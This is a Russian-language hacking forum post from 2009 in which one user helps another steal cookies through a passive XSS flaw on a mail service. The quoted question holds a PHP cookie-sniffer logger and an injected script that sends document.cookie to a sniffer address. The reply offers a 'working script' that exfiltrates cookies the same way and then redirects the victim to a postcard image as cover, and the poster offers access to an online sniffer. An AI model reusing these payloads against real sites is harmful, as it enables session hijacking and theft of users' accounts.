Показать сообщение отдельно

  #9  
Старый 24.09.2009, 09:09
Travakur555
Новичок
Регистрация: 14.09.2009
Сообщений: 7
С нами: 8767316

Репутация: 0
Thumbs up

Цитата:
Сообщение от slavka1  
Здраствуйте уважаемый античат и участники форума.
У меня наболевщая пролемма.
начитавшись всевозможной информации по xss атакам я решил реализовать то что усвоил но пришол в тупик. проблемма наверняка для вас пустяковая, но мне не разобраться одному, поэтому прошу у вас помощи.
По схеме сделал сниффер:

PHP код:
<?php  $fp=fopen("log.html","a+t");  fputs($fp," Время: ".date("")."<br> IP: ".$_SERVER."<br> Откуда: ".htmlentities($_SERVER)."<br> Браузер: ".$_SERVER."<br> QUERY_STRING: ".$_SERVER."<br><br> "); fclose($fp);  ?>
закачал его на хостинг
нашол на форуме в разделе "Пассивные xss на почтовый серверах" нашол эту самую xss:
Код:
http://3k.mai............nt=1&code="><script>alert('xss')</script>
(ссылку даю не полную так как возможно изза этого удаляют мои темы)
этот скрипт работает.
а если вписываешь в него строку со ссылкой инфы на снифер то ноль, вот такой код добавляю:
Код:
<script>img=new Image();img.src="адресс снифера?"+document.cookie();</script>
подскажите в чем проблема тут, фильтрация тегов?
или чтото другое? помогите пожалуста мне больше неккому обратиться.
Как я вкурил,ты хочеш получить куки методом отправки открытки img.держи рабочий скрипт
Код:
<script>img = new Image(); img.src = "адрес снифера"+document.cookie; // здесь ваш код для кражи кукис
 // редирект через 3 сек.
    var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете изменить на свой =)
    var speed = 3000
    function reload() {
    document.location = URL
    }
    setTimeout("reload()", speed);
</script>
сохраняй скрипт в расширение img и будет тебе счастье.а так по большому щету и твой скрипт должен быть рабочий.и если надо могу дать сылку на онлайн снифер которым сам пользуюсь
 
Ответить с цитированием